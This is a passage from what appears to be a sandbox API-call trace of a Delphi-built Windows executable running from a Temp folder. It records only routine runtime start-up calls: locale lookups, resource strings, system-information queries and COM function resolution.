lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0108.803] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0108.803] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0108.803] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0108.803] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0108.803] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0108.803] GetUserDefaultUILanguage () returned 0x409 [0108.804] IsValidLocale (Locale=0x409, dwFlags=0x2) returned 1 [0108.804] GetThreadUILanguage () returned 0x120409 [0108.804] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768) returned 1 [0108.804] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x141a680, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x141a680, pcchLanguagesBuffer=0x12d768) returned 1 [0108.804] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.en-US", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0108.805] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.en", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0108.805] GetUserDefaultUILanguage () returned 0x409 [0108.805] GetLocaleInfoW (in: Locale=0x409, LCType=0x3, lpLCData=0x12d784, cchData=4 | out: lpLCData="ENU") returned 4 [0108.805] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.ENU", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0108.805] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.EN", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0108.805] LoadStringW (in: hInstance=0x400000, uID=0xffc7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Method called on disposed object") returned 0x20 [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffc6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Feature not implemented") returned 0x17 [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffc5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Monitor support function not initialized") returned 0x28 [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffc4, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Object lock not owned") returned 0x15 [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffc3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffc2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17 [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15 [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffc1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10 [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10 [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffd6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19 [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16 [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10 [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16 [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18 [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17 [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10 [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11 [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10 [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0108.806] GetVersionExW (in: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0108.806] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0108.806] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x2f4468 [0108.806] GetProcAddress (hModule=0x76910000, lpProcName="GetNativeSystemInfo") returned 0x7694be77 [0108.806] GetNativeSystemInfo (in: lpSystemInfo=0x12fb1c | out: lpSystemInfo=0x12fb1c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0108.807] LoadStringW (in: hInstance=0x400000, uID=0xff68, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows") returned 0x7 [0108.807] LoadStringW (in: hInstance=0x400000, uID=0xff6b, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows 7") returned 0x9 [0108.807] LoadStringW (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15 [0108.807] LoadStringW (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9 [0108.807] LoadStringW (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17 [0108.807] LoadStringW (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12 [0108.807] LoadStringW (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13 [0108.807] LoadStringW (in: hInstance=0x400000, uID=0xff85, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid file name - %s") returned 0x16 [0108.807] LoadStringW (in: hInstance=0x400000, uID=0xff7d, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="The specified file was not found") returned 0x20 [0108.807] GetVersionExW (in: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x10000, dwMinorVersion=0x5e030006, dwBuildNumber=0x11c, dwPlatformId=0x6, szCSDVersion="\x01") | out: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0108.807] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0108.807] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0108.807] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x13e80dc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDiskFreeSpaceExW", lpUsedDefaultChar=0x0) returned 19 [0108.807] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceExW") returned 0x7694de40 [0108.807] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa0a, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\f8a3iwa6.exe")) returned 0x30 [0108.807] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0108.807] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0108.807] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0108.807] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0108.807] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0108.807] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0108.807] GetThreadLocale () returned 0x409 [0108.807] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x12fb50 | out: lpCPInfo=0x12fb50) returned 1 [0108.807] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0108.807] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0108.808] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0108.808] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0108.808] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x2f4478 [0108.808] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0108.808] GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0x12fab0 | out: Buffer=0x0, ReturnedLength=0x12fab0) returned 0 [0108.808] GetLastError () returned 0x7a [0108.808] GetLogicalProcessorInformation (in: Buffer=0x13d99d0, ReturnedLength=0x12fab0 | out: Buffer=0x13d99d0, ReturnedLength=0x12fab0) returned 1 [0108.808] GetCurrentThreadId () returned 0xcc4 [0108.808] GetCurrentThreadId () returned 0xcc4 [0108.808] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="2") returned 2 [0108.808] GetThreadLocale () returned 0x409 [0108.808] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0108.808] GetThreadLocale () returned 0x409 [0108.808] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0108.808] GetCurrentThreadId () returned 0xcc4 [0108.808] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sun") returned 4 [0108.808] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sunday") returned 7 [0108.808] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Mon") returned 4 [0108.808] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Monday") returned 7 [0108.808] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tue") returned 4 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tuesday") returned 8 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wed") returned 4 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wednesday") returned 10 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thu") returned 4 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thursday") returned 9 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Fri") returned 4 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Friday") returned 7 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sat") returned 4 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Saturday") returned 9 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jan") returned 4 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="January") returned 8 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Feb") returned 4 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="February") returned 9 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Mar") returned 4 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="March") returned 6 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Apr") returned 4 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="April") returned 6 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jun") returned 4 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="June") returned 5 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jul") returned 4 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="July") returned 5 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Aug") returned 4 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="August") returned 7 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Sep") returned 4 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="September") returned 10 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Oct") returned 4 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="October") returned 8 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Nov") returned 4 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="November") returned 9 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Dec") returned 4 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="December") returned 9 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f908, cchData=256 | out: lpLCData="$") returned 2 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0108.810] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0108.810] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0108.810] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fb00, cchData=2 | out: lpLCData=".") returned 2 [0108.810] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f908, cchData=256 | out: lpLCData="2") returned 2 [0108.810] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fb00, cchData=2 | out: lpLCData="/") returned 2 [0108.810] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0108.810] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0108.810] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0108.810] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0108.810] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fb00, cchData=2 | out: lpLCData=":") returned 2 [0108.810] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f908, cchData=256 | out: lpLCData="AM") returned 3 [0108.810] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f908, cchData=256 | out: lpLCData="PM") returned 3 [0108.810] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0108.810] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0108.810] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0108.810] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0108.810] GetModuleHandleW (lpModuleName="oleaut32.dll") returned 0x76c10000 [0108.810] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeTypeEx") returned 0x76c14c28 [0108.810] GetProcAddress (hModule=0x76c10000, lpProcName="VarNeg") returned 0x76c8c802 [0108.810] GetProcAddress (hModule=0x76c10000, lpProcName="VarNot") returned 0x76c8ec66 [0108.810] GetProcAddress (hModule=0x76c10000, lpProcName="VarAdd") returned 0x76c35934 [0108.810] GetProcAddress (hModule=0x76c10000, lpProcName="VarSub") returned 0x76c8d332 [0108.811] GetProcAddress (hModule=0x76c10000, lpProcName="VarMul") returned 0x76c8dbd4 [0108.811] GetProcAddress (hModule=0x76c10000, lpProcName="VarDiv") returned 0x76c8e405 [0108.811] GetProcAddress (hModule=0x76c10000, lpProcName="VarIdiv") returned 0x76c8f00a [0108.811] GetProcAddress (hModule=0x76c10000, lpProcName="VarMod") returned 0x76c8f15e [0108.811] GetProcAddress (hModule=0x76c10000, lpProcName="VarAnd") returned 0x76c35a98 [0108.811] GetProcAddress (hModule=0x76c10000, lpProcName="VarOr") returned 0x76c8ecfa [0108.811] GetProcAddress (hModule=0x76c10000, lpProcName="VarXor") returned 0x76c8ee2e [0108.811] GetProcAddress (hModule=0x76c10000, lpProcName="VarCmp") returned 0x76c2b0dc [0108.811] GetProcAddress (hModule=0x76c10000, lpProcName="VarI4FromStr") returned 0x76c26fab [0108.811] GetProcAddress (hModule=0x76c10000, lpProcName="VarR4FromStr") returned 0x76c301a0 [0108.811] GetProcAddress (hModule=0x76c10000, lpProcName="VarR8FromStr") returned 0x76c2699e [0108.811] GetProcAddress (hModule=0x76c10000, lpProcName="VarDateFromStr") returned 0x76c36ba7 [0108.811] GetProcAddress (hModule=0x76c10000, lpProcName="VarCyFromStr") returned 0x76c56c12 [0108.811] GetProcAddress (hModule=0x76c10000, lpProcName="VarBoolFromStr") returned 0x76c2dbd1 [0108.811] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromCy") returned 0x76c37fdc [0108.812] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromDate") returned 0x76c27a2a [0108.812] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromBool") returned 0x76c30355 [0108.812] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x84 [0108.812] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x88 [0108.812] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8c [0108.812] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=16560107727) returned 1 [0108.812] GetTickCount () returned 0x260a5 [0108.812] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x108)) [0108.812] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x108)) [0108.812] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=16560126151) returned 1 [0108.812] GetTickCount () returned 0x260a5 [0108.812] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x108)) [0108.812] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x108)) [0108.812] GetModuleHandleW (lpModuleName="ole32.dll") returned 0x76750000 [0108.812] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0108.812] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x13e82bc, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoCreateInstanceEx", lpUsedDefaultChar=0x0) returned 18 [0108.812] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstanceEx") returned 0x76799d4e [0108.812] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0108.812] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x13d288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoInitializeEx", lpUsedDefaultChar=0x0) returned 14 [0108.812] GetProcAddress (hModule=0x76750000, lpProcName="CoInitializeEx") returned 0x767909ad [0108.813] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0108.813] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x13e82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoAddRefServerProcess", lpUsedDefaultChar=0x0) returned 21 [0108.813] GetProcAddress (hModule=0x76750000, lpProcName="CoAddRefServerProcess") returned 0x767b3cf3 [0108.813] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0108.813] 